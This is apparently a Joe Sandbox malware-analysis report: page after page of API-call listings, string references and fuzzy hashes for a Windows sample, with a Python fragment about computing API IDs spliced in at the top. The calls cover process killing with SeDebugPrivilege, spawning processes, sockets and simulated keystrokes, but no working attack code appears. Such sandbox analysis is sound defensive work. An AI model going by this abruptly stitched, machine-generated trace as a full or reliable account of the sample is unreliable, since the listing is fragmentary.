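  • Part of subcall function 00952483: GetLastError.KERNEL32(?,?,00951817,00000000,00000000,00000001), ref: 00952498
  • Part of subcall function 00952483: SetEvent.KERNEL32(?,?,00951817,00000000,00000000,00000001), ref: 009524AD
"""

CLEANUP_BLOCK = """\
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008EFAA6
• OleUninitialize.OLE32(?,00000000), ref: 008EFB45
• UnregisterHotKey.USER32(?), ref: 008EFC9C
• DestroyWindow.USER32(?), ref: 009245D6
• FreeLibrary.KERNEL32(?), ref: 0092463B
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00924668
"""

PROCESS_BLOCK = """\
• _memset.LIBCMT ref: 0095F6B5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0095F848
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0095F86C
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0095F8AC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0095F8CE
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0095FA4A
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0095FA7C
• CloseHandle.KERNEL32(?), ref: 0095FAAB
• CloseHandle.KERNEL32(?), ref: 0095FB22
"""

if __name__ == "__main__":
    for label, block in (("wininet", WININET_BLOCK), ("cleanup", CLEANUP_BLOCK), ("process", PROCESS_BLOCK)):
        print(f"{label}: {api_id(block)}")
```

Because the key ignores argument values and call order, two routines with the same set of imports collide on it even when their arguments differ; the Instruction Fuzzy Hash in the same Similarity entry is the field that separates them.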
APIs
  • Part of subcall function 0094466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00943697,?), ref: 0094468B
  • Part of subcall function 0094466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00943697,?), ref: 009446A4
  • Part of subcall function 00944A31: GetFileAttributesW.KERNEL32(?,0094370B), ref: 00944A32
• lstrcmpiW.KERNEL32(?,?), ref: 00944D40
• _wcscmp.LIBCMT ref: 00944D5A
• MoveFileW.KERNEL32(?,?), ref: 00944D75
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
• String ID:
• API String ID: 793581249-0
• Opcode ID: f99a11921e3058ce3c5a9aa1ff68011006ef486b8cdf4a5531e814a5bfaf7138
• Instruction ID: b93156b79c209939bf3290e2e627688098d66edf85ca1881f311bbdc2a3036fb
• Opcode Fuzzy Hash: f99a11921e3058ce3c5a9aa1ff68011006ef486b8cdf4a5531e814a5bfaf7138
• Instruction Fuzzy Hash: A55163B25083859BC724DBA4D881EDFB3ECAF85354F40092EF289D3191EF34A588C756
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009686FF
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
• Opcode ID: 1bda1f2f388b2fe1c86a220be16da1cfadf830ad3744f038bb9797a9d10864fb
• Instruction ID: af1ce913b250fd3684f049a0fb4f4dea64ed7587d21b9ee661c1dbe3c5ce97ce
• Opcode Fuzzy Hash: 1bda1f2f388b2fe1c86a220be16da1cfadf830ad3744f038bb9797a9d10864fb
• Instruction Fuzzy Hash: 0D51C470614244BFDF209B28DC89FAE7BA8FB05350F604715FA21E71A0CFB5A980DB51
APIs
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0091C2F7
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0091C319
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0091C331
• ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0091C34F
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0091C370
• DestroyIcon.USER32(00000000), ref: 0091C37F
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0091C39C
• DestroyIcon.USER32(?), ref: 0091C3AB
  • Part of subcall function 0096A4AF: DeleteObject.GDI32(00000000), ref: 0096A4E8
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
• String ID:
• API String ID: 2819616528-0
• Opcode ID: 38fd787936b8be8414a9fbeef906d9f0fd78673916c98d7319b69de4d1d194f2
• Instruction ID: 35d6c8b638291024f42b087654e3ed93f35d2cffa7c151d058870ee5d89235b4
• Opcode Fuzzy Hash: 38fd787936b8be8414a9fbeef906d9f0fd78673916c98d7319b69de4d1d194f2
• Instruction Fuzzy Hash: 56516A70654249EFDB20DF69DC45FAA37A9FB45320F104528F912E72A0DBB0ED91EB50
APIs
  • Part of subcall function 0093A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0093A84C
  • Part of subcall function 0093A82C: GetCurrentThreadId.KERNEL32 ref: 0093A853
  • Part of subcall function 0093A82C: AttachThreadInput.USER32(00000000,?,00939683,?,00000001), ref: 0093A85A
• MapVirtualKeyW.USER32(00000025,00000000), ref: 0093968E
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009396AB
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 009396AE
• MapVirtualKeyW.USER32(00000025,00000000), ref: 009396B7
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009396D5
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009396D8
• MapVirtualKeyW.USER32(00000025,00000000), ref: 009396E1
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009396F8
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009396FB
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
• Opcode ID: 2a7d283a9c56b29054189bb3f7959504ae60bb552a94bb01554e3a42f3a2e525
• Instruction ID: 7585127eacb54eac4381e6df19c4e5a41f1c5086660cfc229f2c502693344988
• Opcode Fuzzy Hash: 2a7d283a9c56b29054189bb3f7959504ae60bb552a94bb01554e3a42f3a2e525
• Instruction Fuzzy Hash: FC11E571924218BEF7106F60EC4AF6A3B1DDB4C794F110429F244AB0A0C9F35C10EAA4
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0093853C,00000B00,?,?), ref: 0093892A
• HeapAlloc.KERNEL32(00000000,?,0093853C,00000B00,?,?), ref: 00938931
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0093853C,00000B00,?,?), ref: 00938946
• GetCurrentProcess.KERNEL32(?,00000000,?,0093853C,00000B00,?,?), ref: 0093894E
• DuplicateHandle.KERNEL32(00000000,?,0093853C,00000B00,?,?), ref: 00938951
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0093853C,00000B00,?,?), ref: 00938961
• GetCurrentProcess.KERNEL32(0093853C,00000000,?,0093853C,00000B00,?,?), ref: 00938969
• DuplicateHandle.KERNEL32(00000000,?,0093853C,00000B00,?,?), ref: 0093896C
• CreateThread.KERNEL32(00000000,00000000,00938992,00000000,00000000,00000000), ref: 00938986
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: 28bfbe24c8b74b5a265a26c5a73d441dbe49ff23b91a84750d5db945e590cf0c
• Instruction ID: 58ef7053ee8553dfd6260ccee20be03811bb3fd2a2cf38218e19ca7bdfa54216
• Opcode Fuzzy Hash: 28bfbe24c8b74b5a265a26c5a73d441dbe49ff23b91a84750d5db945e590cf0c
• Instruction Fuzzy Hash: 3601BF75258304FFE710ABA5ED5DF673B6CEB89751F414425FA05DB191CAB19800DB20
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
• Opcode ID: 4e17418ef7e7248a9aff71b13df9f046db02db51f39576f24a3c9531c1d6270c
• Instruction ID: 51c26c5d125bf2f9e9284ce7c5eaa0480f87f1a39117d730f2041c36739b3850
• Opcode Fuzzy Hash: 4e17418ef7e7248a9aff71b13df9f046db02db51f39576f24a3c9531c1d6270c
• Instruction Fuzzy Hash: 7AC19371A00209DFEF10DF99D885BAEB7F9FB88315F148469ED49AB280E7709D49CB50
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2862541840-625585964
• Opcode ID: 8fd3e8a763b97533be93dbd282efdab666494dc705a9b007206674537b0b3dfb
• Instruction ID: c8493e81d38d2e8278fa897a0464669e69cf59503d143b1390e650634c66dcf7
• Opcode Fuzzy Hash: 8fd3e8a763b97533be93dbd282efdab666494dc705a9b007206674537b0b3dfb
• Instruction Fuzzy Hash: 1191A471A00215EBEF20DFA6C848FAFB7B8EF45715F108559F915AB280D7709949CBA0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0093710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937044,80070057,?,?,?,00937455), ref: 00937127
                                                                                                                  • Part of subcall function 0093710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937044,80070057,?,?), ref: 00937142
                                                                                                                  • Part of subcall function 0093710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937044,80070057,?,?), ref: 00937150
                                                                                                                  • Part of subcall function 0093710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937044,80070057,?), ref: 00937160
                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00959806
                                                                                                                • _memset.LIBCMT ref: 00959813
                                                                                                                • _memset.LIBCMT ref: 00959956
                                                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00959982
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 0095998D
                                                                                                                Strings
                                                                                                                • NULL Pointer assignment, xrefs: 009599DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                • API String ID: 1300414916-2785691316
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00966E24
                                                                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 00966E38
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00966E52
                                                                                                                • _wcscat.LIBCMT ref: 00966EAD
                                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00966EC4
                                                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00966EF2
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window_wcscat
                                                                                                                • String ID: SysListView32
                                                                                                                • API String ID: 307300125-78025650
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00943C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00943C7A
                                                                                                                  • Part of subcall function 00943C55: Process32FirstW.KERNEL32(00000000,?), ref: 00943C88
                                                                                                                  • Part of subcall function 00943C55: CloseHandle.KERNEL32(00000000), ref: 00943D52
                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0095E9A4
                                                                                                                • GetLastError.KERNEL32 ref: 0095E9B7
                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0095E9E6
                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0095EA63
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 0095EA6E
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0095EAA3
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                • API String ID: 2533919879-2896544425
                                                                                                                APIs
                                                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 00943033
                                                                                                                Similarity
                                                                                                                • API ID: IconLoad
                                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                                • API String ID: 2457776203-404129466
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00944312
                                                                                                                • LoadStringW.USER32(00000000), ref: 00944319
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0094432F
                                                                                                                • LoadStringW.USER32(00000000), ref: 00944336
                                                                                                                • _wprintf.LIBCMT ref: 0094435C
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0094437A
                                                                                                                Strings
                                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 00944357
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                • API String ID: 3648134473-3128320259
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E2612: GetWindowLongW.USER32(?,000000EB), ref: 008E2623
                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 0096D47C
                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 0096D49C
                                                                                                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0096D6D7
                                                                                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0096D6F5
                                                                                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0096D716
                                                                                                                • ShowWindow.USER32(00000003,00000000), ref: 0096D735
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0096D75A
                                                                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 0096D77D
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1211466189-0
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0091C1C7,00000004,00000000,00000000,00000000), ref: 008E2ACF
                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0091C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 008E2B17
                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0091C1C7,00000004,00000000,00000000,00000000), ref: 0091C21A
                                                                                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0091C1C7,00000004,00000000,00000000,00000000), ref: 0091C286
                                                                                                                Similarity
                                                                                                                • API ID: ShowWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1268545403-0
                                                                                                                APIs
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 009470DD
                                                                                                                  • Part of subcall function 00900DB6: std::exception::exception.LIBCMT ref: 00900DEC
                                                                                                                  • Part of subcall function 00900DB6: __CxxThrowException@8.LIBCMT ref: 00900E01
                                                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00947114
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00947130
                                                                                                                • _memmove.LIBCMT ref: 0094717E
                                                                                                                • _memmove.LIBCMT ref: 0094719B
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 009471AA
                                                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009471BF
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 009471DE
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 256516436-0
                                                                                                                • Opcode ID: 1fede4fdf2663814b49ebbd8231f3fba2b393af044cf3ac6d41d3213ef925344
                                                                                                                • Instruction ID: 7327ea0432071c47848b20d827da4d6414f00c4672c9bed5f47464c2abbb222b
                                                                                                                • Opcode Fuzzy Hash: 1fede4fdf2663814b49ebbd8231f3fba2b393af044cf3ac6d41d3213ef925344
                                                                                                                • Instruction Fuzzy Hash: A0316D31904209EFCB00DFA4DD85AAEB779FF89310F1441A9F904AB296DB709A10DBA0
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(00000000), ref: 009661EB
                                                                                                                • GetDC.USER32(00000000), ref: 009661F3
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009661FE
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0096620A
                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00966246
                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00966257
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0096902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00966291
                                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009662B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3864802216-0
                                                                                                                • Opcode ID: 9fbe54781f4af54ab2b7752c912bfc5887a472bfbfe12ea0b7ef6774c5549547
                                                                                                                • Instruction ID: 4126342dd6cf941bf4ce7879b271f13d3b454989fe0a0d940616d4b84f143942
                                                                                                                • Opcode Fuzzy Hash: 9fbe54781f4af54ab2b7752c912bfc5887a472bfbfe12ea0b7ef6774c5549547
                                                                                                                • Instruction Fuzzy Hash: BE318D72114214BFEF108F10DC9AFEA3BADEF4A765F040065FE08DA1A1C6B59841DB70
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 2931989736-0
                                                                                                                • Opcode ID: 51721b0f05e73e22f553cde39ebc0993f5c9cb2fce45825e547c4a3f50bf3a5e
                                                                                                                • Instruction ID: 70e0b1a34c84ce75b044a0a51cc480fbe0137ab60a2dd300e2c489330f94bd6a
                                                                                                                • Opcode Fuzzy Hash: 51721b0f05e73e22f553cde39ebc0993f5c9cb2fce45825e547c4a3f50bf3a5e
                                                                                                                • Instruction Fuzzy Hash: 1121D4636012067BE6246B159D42FFFB36D9E9138CF088425FF4896693EF24DE1189A1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
                                                                                                                  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
                                                                                                                  • Part of subcall function 008FFC86: _wcscpy.LIBCMT ref: 008FFCA9
                                                                                                                • _wcstok.LIBCMT ref: 0094EC94
                                                                                                                • _wcscpy.LIBCMT ref: 0094ED23
                                                                                                                • _memset.LIBCMT ref: 0094ED56
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                • String ID: X
                                                                                                                • API String ID: 774024439-3081909835
                                                                                                                • Opcode ID: 60ca3e8102930a87dbbf4d9ae82e3a782eb43fc4d55928c002460716ad1e4ff6
                                                                                                                • Instruction ID: c7e38bbd77e39b7918e318c22a68a189d752a56a8f4f795235513a201b77fe93
                                                                                                                • Opcode Fuzzy Hash: 60ca3e8102930a87dbbf4d9ae82e3a782eb43fc4d55928c002460716ad1e4ff6
                                                                                                                • Instruction Fuzzy Hash: F0C14B315083519FC724EF28D885E6AB7E4FF86314F10492DF89A9B2A2DB70EC45CB42
                                                                                                                APIs
                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00956C00
                                                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00956C21
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00956C34
                                                                                                                • htons.WSOCK32(?,?,?,00000000,?), ref: 00956CEA
                                                                                                                • inet_ntoa.WSOCK32(?), ref: 00956CA7
                                                                                                                  • Part of subcall function 0093A7E9: _strlen.LIBCMT ref: 0093A7F3
                                                                                                                  • Part of subcall function 0093A7E9: _memmove.LIBCMT ref: 0093A815
                                                                                                                • _strlen.LIBCMT ref: 00956D44
                                                                                                                • _memmove.LIBCMT ref: 00956DAD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                • String ID:
